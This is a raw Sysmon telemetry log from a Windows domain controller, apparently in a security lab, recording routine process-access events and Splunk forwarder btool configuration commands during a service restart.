13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE0-6005-A200-00000000A301}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8EE0-6005-A200-00000000A301}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14738|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.533{59A5CD1D-8EE0-6005-A200-00000000A301}4908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532 10341000x80000000000000003380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.497{59A5CD1D-8EDF-6005-A100-00000000A301}11561240C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDF-6005-A100-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EDF-6005-A100-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8EDF-6005-A000-00000000A301}43604708C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EDF-6005-A100-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.850{59A5CD1D-8EDF-6005-A100-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EDF-6005-A000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000003460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:33.076{59A5CD1D-8EE0-6005-A700-00000000A301}22325040C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-B000-00000000A301}4112C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 